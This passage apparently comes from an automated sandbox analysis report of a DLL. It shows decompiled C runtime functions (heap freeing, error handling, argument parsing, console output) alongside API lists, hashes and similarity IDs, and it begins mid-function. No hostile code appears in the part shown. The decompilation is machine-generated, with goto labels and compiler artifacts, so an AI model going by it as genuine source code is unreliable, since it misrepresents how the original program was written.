                													if(_t49 == 0) {
                														goto L33;
                													} else {
                														SetLastError(_t54);
                													}
                												} else {
                													L33:
                													SetLastError(_t54);
                													_t49 = 0;
                												}
                											}
                										}
                										return _t49;
                									}
                								}
                							}
                						}
                					}
                				}
                			}






















                APIs
                • GetLastError.KERNEL32(?,?,6EA5A35D,00000000,00000001,6EA589CF,?,6EA5A841,00000001,?,?,?,00000008,6EA58968,?,00000000), ref: 6EA5680B
                • _free.LIBCMT ref: 6EA56862
                • _free.LIBCMT ref: 6EA56896
                • SetLastError.KERNEL32(00000000,?,?,?,00000008,6EA58968,?,00000000,00000000,6EA922C0,0000002C,6EA589CF,?), ref: 6EA568A3
                • SetLastError.KERNEL32(00000000,00000004,000000FF,?,6EA5A841,00000001,?,?,?,00000008,6EA58968,?,00000000,00000000,6EA922C0,0000002C), ref: 6EA568AF
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                • Opcode ID: 7b153303714e07559d64569982dda3a0971c96186f5cfb11e7445c3c7776274b
                • Instruction ID: 8194f12ecaf8893d71ef3772a18ce0d8fca694097d82b8a9ede4ded38d194901
                • Opcode Fuzzy Hash: 7b153303714e07559d64569982dda3a0971c96186f5cfb11e7445c3c7776274b
                • Instruction Fuzzy Hash: 5D11E931134A017ED94153E89F4C95B22AD5BC3634B264934F924B53C0EF348CF69128
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6EA5AC19(intOrPtr* _a4) {
                				intOrPtr _t6;
                				intOrPtr* _t21;
                				void* _t23;
                				void* _t24;
                				void* _t25;
                				void* _t26;
                				void* _t27;
                
                				_t21 = _a4;
                				if(_t21 != 0) {
                					_t23 =  *_t21 -  *0x6ea936f0; // 0x6ea936e4
                					if(_t23 != 0) {
                						E6EA56E13(_t7);
                					}
                					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6ea936f4; // 0x6ea94158
                					if(_t24 != 0) {
                						E6EA56E13(_t8);
                					}
                					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6ea936f8; // 0x6ea94158
                					if(_t25 != 0) {
                						E6EA56E13(_t9);
                					}
                					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6ea93720; // 0x6ea936e8
                					if(_t26 != 0) {
                						E6EA56E13(_t10);
                					}
                					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                					_t27 = _t6 -  *0x6ea93724; // 0x6ea9415c
                					if(_t27 != 0) {
                						return E6EA56E13(_t6);
                					}
                				}
                				return _t6;
                			}











                APIs
                • _free.LIBCMT ref: 6EA5AC31
                  • Part of subcall function 6EA56E13: HeapFree.KERNEL32(00000000,00000000,?,6EA56067), ref: 6EA56E29
                  • Part of subcall function 6EA56E13: GetLastError.KERNEL32(?,?,6EA56067), ref: 6EA56E3B
                • _free.LIBCMT ref: 6EA5AC43
                • _free.LIBCMT ref: 6EA5AC55
                • _free.LIBCMT ref: 6EA5AC67
                • _free.LIBCMT ref: 6EA5AC79
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 8c3709c2ec497e7670eb02ef3014753a1fdbf5a93087192479f430a4d13b1e43
                • Instruction ID: 0f16a93cdd08df27f082e82e88731e43d43f7d659be3d28801bfb4048dff2dee
                • Opcode Fuzzy Hash: 8c3709c2ec497e7670eb02ef3014753a1fdbf5a93087192479f430a4d13b1e43
                • Instruction Fuzzy Hash: 05F04F31A11A15978A50DAD8E285D5B7BEEBB453507644C49F4ACEB700CB34FCE18AF8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E6EA55A2A(void* __edx, intOrPtr _a4) {
                				signed int _v8;
                				void* _v12;
                				char _v16;
                				CHAR* _v20;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				CHAR* _t26;
                				intOrPtr* _t36;
                				struct HINSTANCE__* _t37;
                				struct HINSTANCE__* _t40;
                				struct HINSTANCE__* _t43;
                				intOrPtr* _t44;
                				intOrPtr* _t45;
                				intOrPtr _t48;
                				struct HINSTANCE__* _t49;
                				struct HINSTANCE__* _t54;
                				intOrPtr* _t58;
                				void* _t59;
                				struct HINSTANCE__* _t64;
                				intOrPtr _t66;
                
                				_t48 = _a4;
                				if(_t48 != 0) {
                					if(_t48 == 2 || _t48 == 1) {
                						_push(_t59);
                						E6EA57828(_t59);
                						GetModuleFileNameA(0, 0x6ea93b88, 0x104);
                						_t26 =  *0x6ea93e30; // 0xf732a8
                						 *0x6ea93e38 = 0x6ea93b88;
                						_v20 = _t26;
                						if(_t26 == 0 ||  *_t26 == 0) {
                							_t26 = 0x6ea93b88;
                							_v20 = 0x6ea93b88;
                						}
                						_v8 = 0;
                						_v16 = 0;
                						E6EA55B60( &_v8, _t26, 0, 0,  &_v8,  &_v16);
                						_t64 = E6EA55CD4(_v8, _v16, 1);
                						if(_t64 != 0) {
                							E6EA55B60( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                							if(_t48 != 1) {
                								_v12 = 0;
                								_push( &_v12);
                								_t49 = E6EA572FF(_t48, 0, _t64, _t64);
                								if(_t49 == 0) {
                									_t58 = _v12;
                									_t54 = 0;
                									_t36 = _t58;
                									if( *_t58 == 0) {
                										L17:
                										_t37 = 0;
                										 *0x6ea93e24 = _t54;
                										_v12 = 0;
                										_t49 = 0;
                										 *0x6ea93e28 = _t58;
                										L18:
                										E6EA56E13(_t37);
                										_v12 = 0;
                										goto L19;
                									} else {
                										goto L16;
                									}
                									do {
                										L16:
                										_t36 = _t36 + 4;
                										_t54 =  &(_t54->i);
                									} while ( *_t36 != 0);
                									goto L17;
                								}
                								_t37 = _v12;
                								goto L18;
                							}
                							 *0x6ea93e24 = _v8 - 1;
                							_t43 = _t64;
                							_t64 = 0;
                							 *0x6ea93e28 = _t43;
                							goto L12;
                						} else {
                							_t44 = E6EA56DA3();
                							_push(0xc);
                							_pop(0);
                							 *_t44 = 0;
                							L12:
                							_t49 = 0;
                							L19:
                							E6EA56E13(_t64);
                							_t40 = _t49;
                							goto L20;
                						}
                					} else {
                						_t45 = E6EA56DA3();
                						_t66 = 0x16;
                						 *_t45 = _t66;
                						E6EA56CE6();
                						_t40 = _t66;
                						L20:
                						return _t40;
                					}
                				}
                				return 0;
                			}

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                • API String ID: 0-1872383224
                • Opcode ID: 63bb3b99cb5fba5b4311ded9bc3f00648b5f55036a6b40701e44d8013cf74b97
                • Instruction ID: 31af03122d09176f503812a91f1ee1c9bb8801b4ddacb52d4a9c70aefb450a62
                • Opcode Fuzzy Hash: 63bb3b99cb5fba5b4311ded9bc3f00648b5f55036a6b40701e44d8013cf74b97
                • Instruction Fuzzy Hash: FA41A371E14618AFCB11DFD9C98899EBBFCEF86310B154496E504E7300E7709E91CB58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 81%
                			E6EA5986E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                				signed int _v8;
                				intOrPtr _v12;
                				int _v16;
                				char _v20;
                				intOrPtr _v28;
                				char _v32;
                				void* _v44;
                				signed int _t30;
                				signed int _t36;
                				signed int _t40;
                				int _t43;
                				int _t48;
                				intOrPtr _t56;
                				int _t58;
                				short* _t60;
                				signed int _t61;
                				short* _t62;
                
                				_t30 =  *0x6ea93004; // 0x90a7628e
                				_v8 = _t30 ^ _t61;
                				E6EA5633D(__ebx,  &_v32, __edx, _a4);
                				_t48 = _a24;
                				if(_t48 == 0) {
                					_t48 =  *(_v28 + 8);
                				}
                				_t58 = 0;
                				_t36 = MultiByteToWideChar(_t48, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                				_v16 = _t36;
                				if(_t36 == 0) {
                					L16:
                					if(_v20 != 0) {
                						 *(_v32 + 0x350) =  *(_v32 + 0x350) & 0xfffffffd;
                					}
                					return E6EA53252(_v8 ^ _t61);
                				} else {
                					_t56 = _t36 + _t36;
                					_t52 = _t56 + 8;
                					_v12 = _t56;
                					asm("sbb eax, eax");
                					_t40 = _t36 & _t56 + 0x00000008;
                					if(_t40 == 0) {
                						_t60 = 0;
                						L12:
                						if(_t60 != 0) {
                							E6EA54050(_t58, _t60, _t58, _t56);
                							_t43 = MultiByteToWideChar(_t48, 1, _a12, _a16, _t60, _v16);
                							if(_t43 != 0) {
                								_t58 = GetStringTypeW(_a8, _t60, _t43, _a20);
                							}
                						}
                						E6EA59972(_t60);
                						goto L16;
                					}
                					if(_t40 > 0x400) {
                						_t60 = E6EA58C23(_t52, _t40);
                						if(_t60 == 0) {
                							L10:
                							_t56 = _v12;
                							goto L12;
                						}
                						 *_t60 = 0xdddd;
                						L9:
                						_t60 =  &(_t60[4]);
                						goto L10;
                					}
                					E6EA5CFE0();
                					_t60 = _t62;
                					if(_t60 == 0) {
                						goto L10;
                					}
                					 *_t60 = 0xcccc;
                					goto L9;
                				}
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,6EA57A69,00000000,00000000,00000001,00000020,00000100,?,5EFC4D8B), ref: 6EA598B6
                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 6EA5992B
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6EA5993D
                • __freea.LIBCMT ref: 6EA59946
                  • Part of subcall function 6EA58C23: HeapAlloc.KERNEL32(00000000,?,?,?,6EA576B7,00000220,?,?,?,?,?,?,6EA93E18,6EA55A68), ref: 6EA58C55
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                • String ID:
                • API String ID: 573072132-0
                • Opcode ID: cfba9ee196c2016b42282e9245acb4c75994bc20f731b146b9660f9940806d6d
                • Instruction ID: c7b82c5065a88dc103cff60fa9f2841f6ea2595f04de5cd02321b3d31ccf5ec9
                • Opcode Fuzzy Hash: cfba9ee196c2016b42282e9245acb4c75994bc20f731b146b9660f9940806d6d
                • Instruction Fuzzy Hash: 3931A2B190021AEFDB118FE5DD44EEF7B79EF45320F054564E828AA350D73489A1CB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6EA5B266(void* _a4, long _a8, DWORD* _a12) {
                				void* _t13;
                
                				_t13 = WriteConsoleW( *0x6ea93740, _a4, _a8, _a12, 0);
                				if(_t13 == 0 && GetLastError() == 6) {
                					E6EA5B24F();
                					E6EA5B211();
                					_t13 = WriteConsoleW( *0x6ea93740, _a4, _a8, _a12, _t13);
                				}
                				return _t13;
                			}

                APIs
                • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,?,6EA5AE7E,?,00000001,?,00000001,?,6EA5A2E6,00000020,00000000,00000001), ref: 6EA5B27D
                • GetLastError.KERNEL32(?,6EA5AE7E,?,00000001,?,00000001,?,6EA5A2E6,00000020,00000000,00000001,00000020,00000001,?,6EA5A865,00000008), ref: 6EA5B289
                  • Part of subcall function 6EA5B24F: CloseHandle.KERNEL32(FFFFFFFE,6EA5B299,?,6EA5AE7E,?,00000001,?,00000001,?,6EA5A2E6,00000020,00000000,00000001,00000020,00000001), ref: 6EA5B25F
                • ___initconout.LIBCMT ref: 6EA5B299
                  • Part of subcall function 6EA5B211: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EA5B240,6EA5AE64,00000001,?,6EA5A2E6,00000020,00000000,00000001,00000020), ref: 6EA5B224
                • WriteConsoleW.KERNEL32(?,?,0000002C,00000000,?,6EA5AE7E,?,00000001,?,00000001,?,6EA5A2E6,00000020,00000000,00000001,00000020), ref: 6EA5B2AE
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                • String ID:
                • API String ID: 2744216297-0
                • Opcode ID: c2b716e7add3c922282dcb69d3251bdc97b4b9d1d2169867195b8687fd4d0b85
                • Instruction ID: 6f8b4df2686824e20c1da2a88c198d7b5406f16630416439c90b6593b28d03a0
                • Opcode Fuzzy Hash: c2b716e7add3c922282dcb69d3251bdc97b4b9d1d2169867195b8687fd4d0b85
                • Instruction Fuzzy Hash: 00F01C36050624BBCF525FD5CD0898D7F66FB0A7A2B05C510FA19AA224CA328861EBA5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E6EA561A5() {
                
                				E6EA56E13( *0x6ea94148);
                				 *0x6ea94148 = 0;
                				E6EA56E13( *0x6ea9414c);
                				 *0x6ea9414c = 0;
                				E6EA56E13( *0x6ea93e28);
                				 *0x6ea93e28 = 0;
                				E6EA56E13( *0x6ea93e2c);
                				 *0x6ea93e2c = 0;
                				return 1;
                			}

                APIs
                • _free.LIBCMT ref: 6EA561AE
                  • Part of subcall function 6EA56E13: HeapFree.KERNEL32(00000000,00000000,?,6EA56067), ref: 6EA56E29
                  • Part of subcall function 6EA56E13: GetLastError.KERNEL32(?,?,6EA56067), ref: 6EA56E3B
                • _free.LIBCMT ref: 6EA561C1
                • _free.LIBCMT ref: 6EA561D2
                • _free.LIBCMT ref: 6EA561E3
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 8a7c8a7280e2b51eae4731ec4becc2f8c9183e2099d7d025b953a602f55eaaab
                • Instruction ID: 547a298eff3e1653572b2c40b9d5c0c2f43df7a49f22324d6be879ad6f882f81
                • Opcode Fuzzy Hash: 8a7c8a7280e2b51eae4731ec4becc2f8c9183e2099d7d025b953a602f55eaaab
                • Instruction Fuzzy Hash: 26E04F75831B209A8E226F68D4444863AB5B7AA710322C44AE8143B310DF7509B3AF89
                Uniqueness

                Uniqueness Score: -1.00%